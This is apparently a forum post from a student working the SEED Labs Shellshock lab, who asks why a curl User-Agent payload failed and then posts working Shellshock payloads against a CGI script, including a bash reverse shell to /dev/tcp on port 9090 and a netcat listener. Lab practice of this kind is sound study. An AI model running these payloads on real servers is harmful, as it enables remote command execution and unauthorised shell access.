I try to solve seed lab shell shock vulnerability lab in that, i set the agent field by bellow command Curl -A "() {echo hello;}; Content_type: text/plain; echo; /bin/ls -l " http://localhost/cgi-bin/sample.cgi
The out put is still the hello word that placed inside the cgi script
I test the agent field by checking environment variables. It was set to my command but not executed? Any suggestions for why the bash was not parse this to function
I finally got the answer myself, it was because of wrong syntax. The correct syntax is this: Curl -A '() { :;}; Content_type: text/plain; echo; /bin/ls -l' And for running a bash command for get reverse shell is like this: Curl -A '() { :;}; $(/bin/bash -i > /dev/tcp/your ip/9090 2>&1 0>&1'
http://yourwebsiteadrress/cgi-bin/your cgi file
Don't forget to make your machine to listen to 9090 first by this, of course in a new terminal
nc -l 9090 -v
Then you have the reverse shell